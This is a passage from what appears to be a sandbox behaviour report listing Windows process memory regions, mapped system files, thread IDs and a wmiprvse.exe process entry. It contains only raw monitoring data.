entry_point = 0x1c8de60000
region_type = mapped_file
name = "dosvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui")
Region:
id = 1499
start_va = 0x1c8e020000
end_va = 0x1c8e09ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e020000"
filename = ""
Region:
id = 1500
start_va = 0x1c9b000000
end_va = 0x1c9b0fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9b000000"
filename = ""
Region:
id = 1501
start_va = 0x1c9b100000
end_va = 0x1c9b1fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9b100000"
filename = ""
Region:
id = 1502
start_va = 0x1c9b200000
end_va = 0x1c9b2fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9b200000"
filename = ""
Region:
id = 1503
start_va = 0x1c9b300000
end_va = 0x1c9b3fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9b300000"
filename = ""
Region:
id = 1504
start_va = 0x1c9b400000
end_va = 0x1c9b4fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9b400000"
filename = ""
Region:
id = 1505
start_va = 0x1c9b500000
end_va = 0x1c9b5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9b500000"
filename = ""
Region:
id = 1506
start_va = 0x1c9b900000
end_va = 0x1c9b9fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9b900000"
filename = ""
Region:
id = 1507
start_va = 0x1c9ba00000
end_va = 0x1c9bafffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9ba00000"
filename = ""
Region:
id = 1508
start_va = 0x1c9bb00000
end_va = 0x1c9bbfffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9bb00000"
filename = ""
Region:
id = 1509
start_va = 0x1c9bc00000
end_va = 0x1c9bcfffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9bc00000"
filename = ""
Region:
id = 1510
start_va = 0x1c9bd00000
end_va = 0x1c9bdfffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9bd00000"
filename = ""
Region:
id = 1511
start_va = 0x1c9be00000
end_va = 0x1c9befffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9be00000"
filename = ""
Region:
id = 1512
start_va = 0x1c9bf00000
end_va = 0x1c9bffffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9bf00000"
filename = ""
Region:
id = 1513
start_va = 0x1c9c000000
end_va = 0x1c9c0fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9c000000"
filename = ""
Region:
id = 1514
start_va = 0x1c9c100000
end_va = 0x1c9c1fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9c100000"
filename = ""
Region:
id = 1515
start_va = 0x1c9c200000
end_va = 0x1c9c2fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9c200000"
filename = ""
Region:
id = 1516
start_va = 0x1c9c300000
end_va = 0x1c9c3fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9c300000"
filename = ""
Region:
id = 1517
start_va = 0x1c9c400000
end_va = 0x1c9c4fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9c400000"
filename = ""
Region:
id = 1518
start_va = 0x1c9c500000
end_va = 0x1c9c5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9c500000"
filename = ""
Region:
id = 1519
start_va = 0x1c9c600000
end_va = 0x1c9c6fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9c600000"
filename = ""
Region:
id = 1520
start_va = 0x1c9c700000
end_va = 0x1c9c7fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9c700000"
filename = ""
Region:
id = 1521
start_va = 0x1c9c800000
end_va = 0x1c9c8fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9c800000"
filename = ""
Region:
id = 1522
start_va = 0x1c9c900000
end_va = 0x1c9c9fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9c900000"
filename = ""
Region:
id = 1523
start_va = 0x1c9ca00000
end_va = 0x1c9cafffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9ca00000"
filename = ""
Region:
id = 1524
start_va = 0x7ff6c6db2000
end_va = 0x7ff6c6db3fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6db2000"
filename = ""
Region:
id = 1525
start_va = 0x7ff6c6db4000
end_va = 0x7ff6c6db5fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6db4000"
filename = ""
Region:
id = 1526
start_va = 0x7ff6c6db6000
end_va = 0x7ff6c6db7fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6db6000"
filename = ""
Region:
id = 1527
start_va = 0x7ff6c6db8000
end_va = 0x7ff6c6db9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6db8000"
filename = ""
Region:
id = 1528
start_va = 0x7ff6c6dba000
end_va = 0x7ff6c6dbbfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dba000"
filename = ""
Region:
id = 1529
start_va = 0x7ff6c6dbc000
end_va = 0x7ff6c6dbdfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dbc000"
filename = ""
Region:
id = 1530
start_va = 0x7ff6c6dbe000
end_va = 0x7ff6c6dbffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dbe000"
filename = ""
Region:
id = 1531
start_va = 0x7ff6c6dc0000
end_va = 0x7ff6c6dc1fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dc0000"
filename = ""
Region:
id = 1532
start_va = 0x7ff6c6dc2000
end_va = 0x7ff6c6dc3fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dc2000"
filename = ""
Region:
id = 1533
start_va = 0x7ff6c6dc4000
end_va = 0x7ff6c6dc5fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dc4000"
filename = ""
Region:
id = 1534
start_va = 0x7ff6c6dc6000
end_va = 0x7ff6c6dc7fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dc6000"
filename = ""
Region:
id = 1535
start_va = 0x7ff6c6dc8000
end_va = 0x7ff6c6dc9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dc8000"
filename = ""
Region:
id = 1536
start_va = 0x7ff6c6dca000
end_va = 0x7ff6c6dcbfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dca000"
filename = ""
Region:
id = 1537
start_va = 0x7ff6c6dcc000
end_va = 0x7ff6c6dcdfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dcc000"
filename = ""
Region:
id = 1538
start_va = 0x7ff6c6dce000
end_va = 0x7ff6c6dcffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dce000"
filename = ""
Region:
id = 1539
start_va = 0x7ff6c6dd0000
end_va = 0x7ff6c6dd1fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dd0000"
filename = ""
Region:
id = 1540
start_va = 0x7ff6c6dd2000
end_va = 0x7ff6c6dd3fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dd2000"
filename = ""
Region:
id = 1541
start_va = 0x7ff6c6dd4000
end_va = 0x7ff6c6dd5fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dd4000"
filename = ""
Region:
id = 1542
start_va = 0x7ff6c6ddc000
end_va = 0x7ff6c6dddfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6ddc000"
filename = ""
Region:
id = 1543
start_va = 0x7ff6c6dde000
end_va = 0x7ff6c6ddffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dde000"
filename = ""
Region:
id = 1544
start_va = 0x7ff6c6de0000
end_va = 0x7ff6c6de1fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6de0000"
filename = ""
Region:
id = 1545
start_va = 0x7ff6c6de2000
end_va = 0x7ff6c6de3fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6de2000"
filename = ""
Region:
id = 1546
start_va = 0x7ff6c6de4000
end_va = 0x7ff6c6de5fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6de4000"
filename = ""
Region:
id = 1547
start_va = 0x7ff6c6de6000
end_va = 0x7ff6c6de7fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6de6000"
filename = ""
Region:
id = 1548
start_va = 0x7ff6c6e2a000
end_va = 0x7ff6c6e2bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e2a000"
filename = ""
Region:
id = 1549
start_va = 0x7ffb224e0000
end_va = 0x7ffb2278ffff
entry_point = 0x7ffb224e0000
region_type = mapped_file
name = "netshell.dll"
filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll")
Region:
id = 1872
start_va = 0x1c8bc70000
end_va = 0x1c8bc71fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8bc70000"
filename = ""
Region:
id = 1873
start_va = 0x1c8ca20000
end_va = 0x1c8ca26fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8ca20000"
filename = ""
Region:
id = 1874
start_va = 0x1c8dde0000
end_va = 0x1c8dedffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8dde0000"
filename = ""
Region:
id = 1875
start_va = 0x7ffb35df0000
end_va = 0x7ffb35dfcfff
entry_point = 0x7ffb35df0000
region_type = mapped_file
name = "seclogon.dll"
filename = "\\Windows\\System32\\seclogon.dll" (normalized: "c:\\windows\\system32\\seclogon.dll")
Region:
id = 2025
start_va = 0x7ffb35de0000
end_va = 0x7ffb35de8fff
entry_point = 0x7ffb35de0000
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 2195
start_va = 0x1c8bc60000
end_va = 0x1c8bca0fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bc60000"
filename = ""
Region:
id = 2196
start_va = 0x1c8bcb0000
end_va = 0x1c8bcb0fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bcb0000"
filename = ""
Region:
id = 2197
start_va = 0x1c8bcc0000
end_va = 0x1c8bcc0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8bcc0000"
filename = ""
Region:
id = 2198
start_va = 0x1c8bcd0000
end_va = 0x1c8bcd7fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bcd0000"
filename = ""
Region:
id = 2199
start_va = 0x1c8bce0000
end_va = 0x1c8bceffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bce0000"
filename = ""
Region:
id = 2200
start_va = 0x1c8c940000
end_va = 0x1c8c9bffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8c940000"
filename = ""
Region:
id = 2201
start_va = 0x1c8c9c0000
end_va = 0x1c8c9cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8c9c0000"
filename = ""
Region:
id = 2202
start_va = 0x1c8c9d0000
end_va = 0x1c8c9dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8c9d0000"
filename = ""
Region:
id = 2203
start_va = 0x1c8c9e0000
end_va = 0x1c8c9effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8c9e0000"
filename = ""
Region:
id = 2204
start_va = 0x1c8c9f0000
end_va = 0x1c8c9fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8c9f0000"
filename = ""
Region:
id = 2205
start_va = 0x1c8ca00000
end_va = 0x1c8ca0ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8ca00000"
filename = ""
Region:
id = 2206
start_va = 0x1c8ca10000
end_va = 0x1c8ca1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8ca10000"
filename = ""
Region:
id = 2207
start_va = 0x1c8ca30000
end_va = 0x1c8ca3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8ca30000"
filename = ""
Region:
id = 2208
start_va = 0x1c8cdd0000
end_va = 0x1c8cdd0fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8cdd0000"
filename = ""
Region:
id = 2209
start_va = 0x1c8cf00000
end_va = 0x1c8cffffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8cf00000"
filename = ""
Region:
id = 2210
start_va = 0x1c8d500000
end_va = 0x1c8d5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d500000"
filename = ""
Region:
id = 2211
start_va = 0x1c8d8e0000
end_va = 0x1c8d95ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d8e0000"
filename = ""
Region:
id = 2212
start_va = 0x1c8da60000
end_va = 0x1c8db5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8da60000"
filename = ""
Region:
id = 2213
start_va = 0x1c8db60000
end_va = 0x1c8db60fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8db60000"
filename = ""
Region:
id = 2214
start_va = 0x1c8db70000
end_va = 0x1c8db73fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8db70000"
filename = ""
Region:
id = 2215
start_va = 0x1c8db80000
end_va = 0x1c8db81fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8db80000"
filename = ""
Region:
id = 2216
start_va = 0x1c8dba0000
end_va = 0x1c8dba0fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8dba0000"
filename = ""
Region:
id = 2217
start_va = 0x1c8def0000
end_va = 0x1c8defffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8def0000"
filename = ""
Region:
id = 2218
start_va = 0x1c8e0a0000
end_va = 0x1c8e0ecfff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8e0a0000"
filename = ""
Region:
id = 2219
start_va = 0x1c8e0f0000
end_va = 0x1c8e0f7fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e0f0000"
filename = ""
Region:
id = 2220
start_va = 0x1c8e300000
end_va = 0x1c8e3fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e300000"
filename = ""
Region:
id = 2221
start_va = 0x1c8e400000
end_va = 0x1c8e44cfff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e400000"
filename = ""
Region:
id = 2222
start_va = 0x1c8e450000
end_va = 0x1c8e45ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8e450000"
filename = ""
Region:
id = 2223
start_va = 0x1c8e460000
end_va = 0x1c8e46ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8e460000"
filename = ""
Region:
id = 2224
start_va = 0x1c8e470000
end_va = 0x1c8e47ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8e470000"
filename = ""
Region:
id = 2225
start_va = 0x1c8e480000
end_va = 0x1c8e48ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8e480000"
filename = ""
Region:
id = 2226
start_va = 0x1c8e490000
end_va = 0x1c8e49ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8e490000"
filename = ""
Region:
id = 2227
start_va = 0x1c8e4a0000
end_va = 0x1c8e4affff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8e4a0000"
filename = ""
Region:
id = 2228
start_va = 0x1c8e4b0000
end_va = 0x1c8e4dffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e4b0000"
filename = ""
Region:
id = 2229
start_va = 0x1c8e4e0000
end_va = 0x1c8e4effff
entry_point = 0x1c8e4e0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 2230
start_va = 0x1c8e4f0000
end_va = 0x1c8e4fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e4f0000"
filename = ""
Region:
id = 2231
start_va = 0x1c8e500000
end_va = 0x1c8e50ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e500000"
filename = ""
Region:
id = 2232
start_va = 0x1c8e510000
end_va = 0x1c8e51ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e510000"
filename = ""
Region:
id = 2233
start_va = 0x1c8e520000
end_va = 0x1c8e52ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e520000"
filename = ""
Region:
id = 2234
start_va = 0x1c8e530000
end_va = 0x1c8e53ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e530000"
filename = ""
Region:
id = 2235
start_va = 0x1c8e540000
end_va = 0x1c8e54ffff
entry_point = 0x1c8e540000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 2236
start_va = 0x1c8e550000
end_va = 0x1c8e55ffff
entry_point = 0x1c8e550000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 2237
start_va = 0x1c8e560000
end_va = 0x1c8e567fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e560000"
filename = ""
Region:
id = 2238
start_va = 0x1c8e570000
end_va = 0x1c8e57ffff
entry_point = 0x1c8e570000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 2239
start_va = 0x1c8e580000
end_va = 0x1c8e58ffff
entry_point = 0x1c8e580000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 2240
start_va = 0x1c8e590000
end_va = 0x1c8e59ffff
entry_point = 0x1c8e590000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 2241
start_va = 0x1c8e5a0000
end_va = 0x1c8e5affff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e5a0000"
filename = ""
Region:
id = 2242
start_va = 0x1c8e5b0000
end_va = 0x1c8e5bffff
entry_point = 0x1c8e5b0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 2243
start_va = 0x1c8e5c0000
end_va = 0x1c8e5cffff
entry_point = 0x1c8e5c0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 2244
start_va = 0x1c8e5d0000
end_va = 0x1c8e5dffff
entry_point = 0x1c8e5d0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 2245
start_va = 0x1c91400000
end_va = 0x1c923fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c91400000"
filename = ""
Region:
id = 2246
start_va = 0x1c92400000
end_va = 0x1c963fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c92400000"
filename = ""
Region:
id = 2247
start_va = 0x1c96400000
end_va = 0x1c9a3fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c96400000"
filename = ""
Region:
id = 2248
start_va = 0x7ff6c6f87000
end_va = 0x7ff6c6f88fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6f87000"
filename = ""
Region:
id = 2249
start_va = 0x7ff6c6f8c000
end_va = 0x7ff6c6f8dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6f8c000"
filename = ""
Region:
id = 2250
start_va = 0x7ffb36ff0000
end_va = 0x7ffb370affff
entry_point = 0x7ffb36ff0000
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Thread:
id = 12
os_tid = 0xcac
Thread:
id = 13
os_tid = 0xcb0
Thread:
id = 14
os_tid = 0xd28
Thread:
id = 15
os_tid = 0xd2c
Thread:
id = 16
os_tid = 0xd24
Thread:
id = 17
os_tid = 0xd20
Thread:
id = 18
os_tid = 0xd1c
Thread:
id = 19
os_tid = 0xd18
Thread:
id = 20
os_tid = 0xd04
Thread:
id = 21
os_tid = 0xd00
Thread:
id = 22
os_tid = 0x1a4
Thread:
id = 23
os_tid = 0x810
Thread:
id = 24
os_tid = 0xbd4
Thread:
id = 25
os_tid = 0x9e0
Thread:
id = 26
os_tid = 0x734
Thread:
id = 27
os_tid = 0x890
Thread:
id = 28
os_tid = 0x884
Thread:
id = 29
os_tid = 0x528
Thread:
id = 30
os_tid = 0x2b8
Thread:
id = 31
os_tid = 0x4cc
Thread:
id = 32
os_tid = 0x7f8
Thread:
id = 33
os_tid = 0x7c4
Thread:
id = 34
os_tid = 0x7a4
Thread:
id = 35
os_tid = 0x7a0
Thread:
id = 36
os_tid = 0x79c
Thread:
id = 37
os_tid = 0x798
Thread:
id = 38
os_tid = 0x794
Thread:
id = 39
os_tid = 0x760
Thread:
id = 40
os_tid = 0x790
Thread:
id = 41
os_tid = 0x784
Thread:
id = 42
os_tid = 0x780
Thread:
id = 43
os_tid = 0x750
Thread:
id = 44
os_tid = 0x72c
Thread:
id = 45
os_tid = 0x720
Thread:
id = 46
os_tid = 0x6f4
Thread:
id = 47
os_tid = 0x6d0
Thread:
id = 48
os_tid = 0x6a8
Thread:
id = 49
os_tid = 0x6a4
Thread:
id = 50
os_tid = 0x668
Thread:
id = 51
os_tid = 0x638
Thread:
id = 52
os_tid = 0x628
Thread:
id = 53
os_tid = 0x1e0
Thread:
id = 54
os_tid = 0x618
Thread:
id = 55
os_tid = 0x600
Thread:
id = 56
os_tid = 0x5f8
Thread:
id = 57
os_tid = 0x5d0
Thread:
id = 58
os_tid = 0x5ac
Thread:
id = 59
os_tid = 0x5a0
Thread:
id = 60
os_tid = 0x534
Thread:
id = 61
os_tid = 0x4e0
Thread:
id = 62
os_tid = 0x160
Thread:
id = 63
os_tid = 0x190
Thread:
id = 64
os_tid = 0x280
Thread:
id = 65
os_tid = 0x154
Thread:
id = 66
os_tid = 0x120
Thread:
id = 67
os_tid = 0xf8
Thread:
id = 68
os_tid = 0xf4
Thread:
id = 69
os_tid = 0x3f4
Thread:
id = 70
os_tid = 0x3f0
Thread:
id = 71
os_tid = 0x3e0
Thread:
id = 72
os_tid = 0x3d0
Thread:
id = 73
os_tid = 0x3c8
Thread:
id = 74
os_tid = 0x3a4
Thread:
id = 75
os_tid = 0x394
Thread:
id = 76
os_tid = 0x390
Thread:
id = 77
os_tid = 0x330
Thread:
id = 78
os_tid = 0x278
Thread:
id = 79
os_tid = 0x200
Thread:
id = 87
os_tid = 0xc4c
Thread:
id = 88
os_tid = 0xc48
Thread:
id = 104
os_tid = 0x568
Thread:
id = 105
os_tid = 0xce4
Thread:
id = 106
os_tid = 0xcec
Thread:
id = 115
os_tid = 0xce0
Thread:
id = 116
os_tid = 0xd5c
Thread:
id = 126
os_tid = 0xdb4
Thread:
id = 127
os_tid = 0xe44
Thread:
id = 128
os_tid = 0xe20
Thread:
id = 129
os_tid = 0xe30
Thread:
id = 130
os_tid = 0xe28
Thread:
id = 131
os_tid = 0xe24
Thread:
id = 132
os_tid = 0xd4c
Thread:
id = 133
os_tid = 0xd48
Thread:
id = 134
os_tid = 0xd38
Thread:
id = 135
os_tid = 0xd40
Thread:
id = 136
os_tid = 0xd44
Thread:
id = 137
os_tid = 0xe54
Thread:
id = 138
os_tid = 0xe60
Thread:
id = 139
os_tid = 0xe64
Thread:
id = 140
os_tid = 0xe74
Thread:
id = 141
os_tid = 0xe58
Thread:
id = 142
os_tid = 0xb0
Thread:
id = 143
os_tid = 0xc60
Thread:
id = 144
os_tid = 0x6e4
Thread:
id = 145
os_tid = 0xea0
Thread:
id = 146
os_tid = 0x708
Thread:
id = 147
os_tid = 0x2c0
Thread:
id = 148
os_tid = 0x428
Thread:
id = 149
os_tid = 0x68c
Thread:
id = 150
os_tid = 0xb6c
Thread:
id = 151
os_tid = 0xb24
Thread:
id = 152
os_tid = 0x688
Thread:
id = 157
os_tid = 0xec4
Thread:
id = 160
os_tid = 0x84
Thread:
id = 161
os_tid = 0xfd4
Thread:
id = 163
os_tid = 0xc30
Thread:
id = 164
os_tid = 0xc54
Thread:
id = 166
os_tid = 0xc44
Thread:
id = 167
os_tid = 0xbec
Thread:
id = 174
os_tid = 0x5e4
Thread:
id = 175
os_tid = 0x3e4
Thread:
id = 185
os_tid = 0x788
Thread:
id = 186
os_tid = 0xcd8
Thread:
id = 207
os_tid = 0xde0
Thread:
id = 208
os_tid = 0xc74
Thread:
id = 239
os_tid = 0x9e0
Thread:
id = 240
os_tid = 0x200
Thread:
id = 241
os_tid = 0x278
Process:
id = "3"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0x33581000"
os_pid = "0xae8"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "2"
os_parent_pid = "0x32c"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Network Service"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0002efd7" [0xc000000f]
Region:
id = 830
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 831
start_va = 0x8937c0000
end_va = 0x8937cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000008937c0000"
filename = ""
Region:
id = 832
start_va = 0x8937d0000
end_va = 0x8937d6fff
entry_point = 0x0
region_type = private
name = "private_0x00000008937d0000"
filename = ""
Region:
id = 833
start_va = 0x8937e0000
end_va = 0x8937f3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000008937e0000"
filename = ""
Region:
id = 834
start_va = 0x893800000
end_va = 0x89387ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000893800000"
filename = ""
Region:
id = 835
start_va = 0x893880000
end_va = 0x893883fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000893880000"
filename = ""
Region:
id = 836
start_va = 0x893890000
end_va = 0x893890fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000893890000"
filename = ""
Region:
id = 837
start_va = 0x8938a0000
end_va = 0x8938a1fff
entry_point = 0x0
region_type = private
name = "private_0x00000008938a0000"
filename = ""
Region:
id = 838
start_va = 0x8938b0000
end_va = 0x89396dfff
entry_point = 0x8938b0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 839
start_va = 0x8939f0000
end_va = 0x8939f6fff
entry_point = 0x0
region_type = private
name = "private_0x00000008939f0000"
filename = ""
Region:
id = 840
start_va = 0x893a00000
end_va = 0x893a00fff
entry_point = 0x0
region_type = private
name = "private_0x0000000893a00000"
filename = ""
Region:
id = 841
start_va = 0x893a10000
end_va = 0x893a10fff
entry_point = 0x0
region_type = private
name = "private_0x0000000893a10000"
filename = ""
Region:
id = 842
start_va = 0x893a20000
end_va = 0x893a24fff
entry_point = 0x893a20000
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 843
start_va = 0x893a30000
end_va = 0x893a30fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000893a30000"
filename = ""
Region:
id = 844
start_va = 0x893a40000
end_va = 0x893b3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000893a40000"
filename = ""
Region:
id = 845
start_va = 0x893b40000
end_va = 0x893b40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000893b40000"
filename = ""
Region:
id = 846
start_va = 0x893b50000
end_va = 0x893b50fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000893b50000"
filename = ""
Region:
id = 847
start_va = 0x893b70000
end_va = 0x893b72fff
entry_point = 0x893b70000
region_type = mapped_file
name = "cimwin32.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui")
Region:
id = 848
start_va = 0x893ba0000
end_va = 0x893baffff
entry_point = 0x0
region_type = private
name = "private_0x0000000893ba0000"
filename = ""
Region:
id = 849
start_va = 0x893bb0000
end_va = 0x893ee6fff
entry_point = 0x893bb0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 850
start_va = 0x893ef0000
end_va = 0x894077fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000893ef0000"
filename = ""
Region:
id = 851
start_va = 0x894080000
